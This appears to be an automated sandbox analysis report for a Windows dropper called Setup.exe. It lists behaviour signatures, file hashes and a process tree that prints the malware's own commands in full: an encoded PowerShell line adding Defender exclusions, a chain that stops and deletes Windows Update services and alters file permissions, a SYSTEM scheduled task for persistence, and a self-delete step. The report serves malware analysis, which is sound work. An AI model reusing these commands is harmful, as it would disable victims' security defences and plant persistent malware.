Analysis
-
max time kernel
71s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
05-05-2022 01:16
General
-
Target
Setup.exe
-
Size
4.6MB
-
MD5
62ed80f638e9551e1e59b4ea9341bccd
-
SHA1
44196e8cb0f5774decf60e12215767f092c3c008
-
SHA256
c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
-
SHA512
56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\iexplor.exeC:\Users\Admin\AppData\Local\Temp\iexplor.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeC:\Users\Admin\AppData\Local\Temp\iexplore.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "iexplore"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {D7ABF8F3-C3ED-4AE0-8517-F0C5D6298CF7} S-1-5-18:NT AUTHORITY\System:Service:1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\iexplor.exeFilesize
372.5MB
MD5524c03c2e8a444e99d81693972a509bc
SHA1e126e068d02c0917e7d69f89713baf230e501627
SHA25648049c42c1b97e1434eca4d3e5add9b4e3a63704641ecc9566fc47a7897b2a10
SHA5127b3ca6cdbb29cb46fd4847712f552960fd1447d9211559a3017b43aa4e1a422bc75f0292f2211b8109a0040dae86e78d918d5c4efe8bf7197e08db4e15e51f5e
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeFilesize
366.0MB
MD51b583b77bb7ba4973568e26f8bf5e671
SHA1239145e8a8bebe08e19b918a13f4a1f7109ae2a9
SHA256a459c73907303c22dbcbd2dab17952f0b0bac003c5d659e676934610697d66a4
SHA512726d3a34f41ed3f90afb8baf326085dba32168db5ba626fae4177679565cf6e5dcce3d3ebd6a285551db6d77d3eb6f1304dd9ef964a62b3e2aa1f424178972f9
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeFilesize
363.7MB
MD5195c6917677f2f7378393cf75df8ab22
SHA123ef9024de43587e8dae49f3d3cd6d94be775634
SHA25649eb394e78d680dbeb7d7d22912c4da0f89b953c0c6452c49eeacacf5c74ac37
SHA5125359b783da6b557da4e4df5cff7b75e74a6276b4c33fb1212a8b1aaf49ee262ad8ff19fa22c1029bb3f2ecfd19428c516ef7f8a1315e264fa36d4c82777cfc0c
-
\Users\Admin\AppData\Local\Temp\iexplor.exeFilesize
395.9MB
MD56340107b794f0b0b0181d9d9b1b9e194
SHA1d4c4b1f48762a800834708db5046bae6afb39e7a
SHA25674884a97d70098350a57d57009544f4a307be1085e44755161a03ba4139dff91
SHA512ad389885e483cfd481050ac02a7309508ba503d5a868300401370e36d854deae4822ccf8268027156612712a80a6eba6f0c95dd19cbd494f9db7f448eddc49d5
-
\Users\Admin\AppData\Local\Temp\iexplore.exeFilesize
363.6MB
MD58e5e4af781887aca318cf241af7408d3
SHA11b59af5fa97f53c8edf8d04c3085e5a475ee2d0c
SHA25682830e61120000e56d91b143d7a11010627b5c004ff70e5271c7155c931869de
SHA5122e21a3cc9b85baba76062a2ea3925f666981900bbfc40d780f1a4aa0ec98be9c5546560f26dc1e6712c2b80766a495580112c84fdde386e94978f0b80fc8116e
-
memory/432-98-0x0000000000000000-mapping.dmp
-
memory/616-101-0x0000000000000000-mapping.dmp
-
memory/676-96-0x0000000000000000-mapping.dmp
-
memory/740-94-0x0000000000000000-mapping.dmp
-
memory/744-95-0x0000000000000000-mapping.dmp
-
memory/776-93-0x0000000000000000-mapping.dmp
-
memory/808-90-0x0000000000000000-mapping.dmp
-
memory/820-112-0x0000000000000000-mapping.dmp
-
memory/876-99-0x0000000000000000-mapping.dmp
-
memory/960-85-0x0000000000000000-mapping.dmp
-
memory/972-84-0x0000000000000000-mapping.dmp
-
memory/972-108-0x0000000000000000-mapping.dmp
-
memory/1008-73-0x000000013F890000-0x000000013FAAC000-memory.dmpFilesize
2.1MB
-
memory/1008-75-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmpFilesize
8KB
-
memory/1008-74-0x000000001C9E0000-0x000000001CBDA000-memory.dmpFilesize
2.0MB
-
memory/1008-70-0x0000000000000000-mapping.dmp
-
memory/1028-110-0x0000000000000000-mapping.dmp
-
memory/1036-66-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1036-58-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1036-60-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1036-65-0x000000000041CE12-mapping.dmp
-
memory/1036-67-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1060-91-0x0000000000000000-mapping.dmp
-
memory/1064-107-0x0000000000000000-mapping.dmp
-
memory/1072-105-0x0000000000000000-mapping.dmp
-
memory/1244-92-0x0000000000000000-mapping.dmp
-
memory/1284-88-0x0000000000000000-mapping.dmp
-
memory/1436-111-0x0000000000000000-mapping.dmp
-
memory/1452-54-0x0000000075EF1000-0x0000000075EF3000-memory.dmpFilesize
8KB
-
memory/1488-102-0x0000000000000000-mapping.dmp
-
memory/1496-106-0x0000000000000000-mapping.dmp
-
memory/1504-56-0x0000000000000000-mapping.dmp
-
memory/1656-97-0x0000000000000000-mapping.dmp
-
memory/1704-104-0x0000000000000000-mapping.dmp
-
memory/1712-87-0x0000000000000000-mapping.dmp
-
memory/1756-100-0x0000000000000000-mapping.dmp
-
memory/1768-86-0x0000000000000000-mapping.dmp
-
memory/1768-109-0x0000000000000000-mapping.dmp
-
memory/1772-83-0x0000000000000000-mapping.dmp
-
memory/1800-103-0x0000000000000000-mapping.dmp
-
memory/1812-79-0x000007FEEBCF0000-0x000007FEEC84D000-memory.dmpFilesize
11.4MB
-
memory/1812-77-0x0000000000000000-mapping.dmp
-
memory/1812-82-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/1812-81-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/1812-80-0x000000001B720000-0x000000001BA1F000-memory.dmpFilesize
3.0MB
-
memory/1856-76-0x0000000000000000-mapping.dmp
-
memory/1992-89-0x0000000000000000-mapping.dmp